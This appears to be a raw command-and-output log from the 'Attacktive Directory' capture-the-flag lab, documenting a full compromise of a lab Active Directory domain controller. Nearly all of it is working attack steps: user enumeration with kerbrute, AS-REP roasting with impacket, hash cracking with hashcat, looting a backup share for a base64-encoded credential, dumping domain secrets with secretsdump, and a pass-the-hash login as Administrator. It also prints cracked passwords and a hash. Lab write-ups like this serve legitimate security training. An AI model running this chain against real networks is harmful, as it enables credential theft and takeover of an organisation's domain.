Attacktive Directory
sudo python3 ~/tools/enum4linux-ng/enum4linux-ng.py -A 10.10.113.122
ENUM4LINUX - next generation
==========================
| Target Information |
==========================
[*] Target ........... 10.10.113.122
[*] Username ......... ''
[*] Random Username .. 'fvqodhau'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)
=====================================
| Service Scan on 10.10.113.122 |
=====================================
[*] Checking LDAP
[+] LDAP is accessible on 389/tcp
[*] Checking LDAPS
[+] LDAPS is accessible on 636/tcp
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp
=====================================================
| Domain Information via LDAP for 10.10.113.122 |
=====================================================
[*] Trying LDAP
[+] Appears to be root/parent DC
[+] Long domain name is: spookysec.local
=====================================================
| NetBIOS Names and Workgroup for 10.10.113.122 |
=====================================================
[-] Could not get NetBIOS names information via 'nmblookup': timed out
==========================================
| SMB Dialect Check on 10.10.113.122 |
==========================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
SMB 1.0: false
SMB 2.02: true
SMB 2.1: true
SMB 3.0: true
SMB1 only: false
Preferred dialect: SMB 3.0
SMB signing required: true
==========================================
| RPC Session Check on 10.10.113.122 |
==========================================
[*] Check for null session
[+] Server allows session using username '', password ''
[*] Check for random user session
[-] Could not establish random user session: STATUS_LOGON_FAILURE
====================================================
| Domain Information via RPC for 10.10.113.122 |
====================================================
[+] Domain: THM-AD
[+] SID: S-1-5-21-3591857110-2884097990-301047963
[+] Host is part of a domain (not a workgroup)
============================================================
| Domain Information via SMB session for 10.10.113.122 |
============================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: ATTACKTIVEDIREC
NetBIOS domain name: THM-AD
DNS domain: spookysec.local
FQDN: AttacktiveDirectory.spookysec.local
================================================
| OS Information via RPC for 10.10.113.122 |
================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[-] Could not get OS info via 'srvinfo': STATUS_ACCESS_DENIED
[+] After merging OS information we have the following result:
OS: Windows 10, Windows Server 2019, Windows Server 2016
OS version: '10.0'
OS release: '1809'
OS build: '17763'
Native OS: not supported
Native LAN manager: not supported
Platform id: null
Server type: null
Server type string: null
======================================
| Users via RPC on 10.10.113.122 |
======================================
[*] Enumerating users via 'querydispinfo'
[-] Could not find users via 'querydispinfo': STATUS_ACCESS_DENIED
[*] Enumerating users via 'enumdomusers'
[-] Could not find users via 'enumdomusers': STATUS_ACCESS_DENIED
=======================================
| Groups via RPC on 10.10.113.122 |
=======================================
[*] Enumerating local groups
[-] Could not get groups via 'enumalsgroups domain': STATUS_ACCESS_DENIED
[*] Enumerating builtin groups
[-] Could not get groups via 'enumalsgroups builtin': STATUS_ACCESS_DENIED
[*] Enumerating domain groups
[-] Could not get groups via 'enumdomgroups': STATUS_ACCESS_DENIED
=======================================
| Shares via RPC on 10.10.113.122 |
=======================================
[*] Enumerating shares
[+] Found 0 share(s) for user '' with password '', try a different user
==========================================
| Policies via RPC for 10.10.113.122 |
==========================================
[*] Trying port 445/tcp
[-] SMB connection error on port 445/tcp: STATUS_ACCESS_DENIED
[*] Trying port 139/tcp
[-] SMB connection error on port 139/tcp: session failed
==========================================
| Printers via RPC for 10.10.113.122 |
==========================================
[-] Could not get printer info via 'enumprinters': STATUS_ACCESS_DENIED
Completed after 24.92 seconds
sudo nmap -T5 -Pn 10.10.113.122
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-30 14:08 EST
Warning: 10.10.113.122 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.113.122
Host is up (0.13s latency).
Not shown: 987 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
Nmap done: 1 IP address (1 host up) scanned in 7.80 seconds
~/tools/kerbrute userenum --dc 10.10.113.122 -d THM-AD userlist.txt
Version: v1.0.3 (9dad6e1) - 12/30/21 - Ronnie Flathers @ropnop
2021/12/30 14:15:15 > Using KDC(s):
2021/12/30 14:15:15 > 10.10.113.122:88
2021/12/30 14:15:16 > [+] VALID USERNAME: james@THM-AD
2021/12/30 14:15:18 > [+] VALID USERNAME: svc-admin@THM-AD
2021/12/30 14:15:21 > [+] VALID USERNAME: James@THM-AD
2021/12/30 14:15:22 > [+] VALID USERNAME: robin@THM-AD
2021/12/30 14:15:33 > [+] VALID USERNAME: darkstar@THM-AD
2021/12/30 14:15:40 > [+] VALID USERNAME: administrator@THM-AD
2021/12/30 14:15:54 > [+] VALID USERNAME: backup@THM-AD
2021/12/30 14:16:01 > [+] VALID USERNAME: paradox@THM-AD
2021/12/30 14:16:46 > [+] VALID USERNAME: JAMES@THM-AD
2021/12/30 14:17:02 > [+] VALID USERNAME: Robin@THM-AD
2021/12/30 14:18:34 > [+] VALID USERNAME: Administrator@THM-AD
2021/12/30 14:21:32 > [+] VALID USERNAME: Darkstar@THM-AD
2021/12/30 14:22:30 > [+] VALID USERNAME: Paradox@THM-AD
2021/12/30 14:25:46 > [+] VALID USERNAME: DARKSTAR@THM-AD
2021/12/30 14:26:43 > [+] VALID USERNAME: ori@THM-AD
2021/12/30 14:28:27 > [+] VALID USERNAME: ROBIN@THM-AD
2021/12/30 14:32:45 > Done! Tested 73317 usernames (16 valid) in 1049.395 seconds
impacket-GetNPUsers THM-AD/ -usersfile valid_users.txt -format hashcat -outputfile npusers.hashcat
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[-] User james doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User James doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User robin doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User darkstar doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User backup doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User paradox doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User JAMES doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Robin doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Darkstar doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Paradox doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User DARKSTAR doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ori doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ROBIN doesn't have UF_DONT_REQUIRE_PREAUTH set
cat npusers.hashcat
$krb5asrep$23$svc-admin@THM-AD:6c4b5c587e1486e85fae515d595277df$5ef7185503df999a7262b798d7908b42ee9cb2ec070423bb2a6397c2029cc73435bc6733a0e13c953f9e37f2bb50aa6b2d157e08661cf2a14570333d4b647933864c7cf9e630a87c354ae54e734efcba59398a57a40c8d79d20e3839ea10fa3d65648beb5934bc9e802541fdecbd35a1616edd671c4cb99051d0e6133c129a2e54ab580ec1f941f65e00c81091078f533e5d152a009352cbcc5b423aedc4d89ae86750f50b727b41e61c0053bba6fe1541acfd485fe739ddab8002c4a5a45237d61d02be73d41e1bc3c9ff727512d870d8d04b3528e716b5233978b31a809fdd5de102f43575daa451
hashcat -m 18200 -a 0 npusers.hashcat passwordlist.txt
hashcat (v6.1.1) starting...
OpenCL API (OpenCL 2.0 pocl 1.8 Linux, None+Asserts, RELOC, LLVM 11.1.0, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=====================================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i7-9750H CPU @ 2.60GHz, 13895/13959 MB (4096 MB allocatable), 6MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Host memory required for this attack: 169 MB
Dictionary cache hit:
* Filename..: passwordlist.txt
* Passwords.: 70188
* Bytes.....: 569236
* Keyspace..: 70188
$krb5asrep$23$svc-admin@THM-AD:6c4b5c587e1486e85fae515d595277df$5ef7185503df999a7262b798d7908b42ee9cb2ec070423bb2a6397c2029cc73435bc6733a0e13c953f9e37f2bb50aa6b2d157e08661cf2a14570333d4b647933864c7cf9e630a87c354ae54e734efcba59398a57a40c8d79d20e3839ea10fa3d65648beb5934bc9e802541fdecbd35a1616edd671c4cb99051d0e6133c129a2e54ab580ec1f941f65e00c81091078f533e5d152a009352cbcc5b423aedc4d89ae86750f50b727b41e61c0053bba6fe1541acfd485fe739ddab8002c4a5a45237d61d02be73d41e1bc3c9ff727512d870d8d04b3528e716b5233978b31a809fdd5de102f43575daa451:management2005
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, AS-REP
Hash.Target......: $krb5asrep$23$svc-admin@THM-AD:6c4b5c587e1486e85fae...daa451
Time.Started.....: Thu Dec 30 15:20:45 2021 (0 secs)
Time.Estimated...: Thu Dec 30 15:20:45 2021 (0 secs)
Guess.Base.......: File (passwordlist.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1764.8 kH/s (5.36ms) @ Accel:32 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 12288/70188 (17.51%)
Rejected.........: 0/12288 (0.00%)
Restore.Point....: 0/70188 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: m123456 -> henrik
Started: Thu Dec 30 15:20:44 2021
Stopped: Thu Dec 30 15:20:47 2021
smbclient -L 10.10.113.122 -U 'svc-admin' -p
Enter WORKGROUP\svc-admin's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backup Disk
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.113.122 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
smbclient //10.10.113.122/backup -U 'svc-admin' -p
Enter WORKGROUP\svc-admin's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Apr 4 15:08:39 2020
.. D 0 Sat Apr 4 15:08:39 2020
backup_credentials.txt A 48 Sat Apr 4 15:08:53 2020
8247551 blocks of size 4096. 3636099 blocks available
smb: \> get backup_credentials.txt
getting file \backup_credentials.txt of size 48 as backup_credentials.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> exit
cat backup_credentials.txt
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw
echo 'YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw' | base64 -d
backup@spookysec.local:backup2517860
impacket-secretsdump -just-dc THM-AD/backup:backup2517860@10.10.113.122
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[*] Kerberos keys grabbed
[*] Cleaning up...
evil-winrm -i 10.10.199.242 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc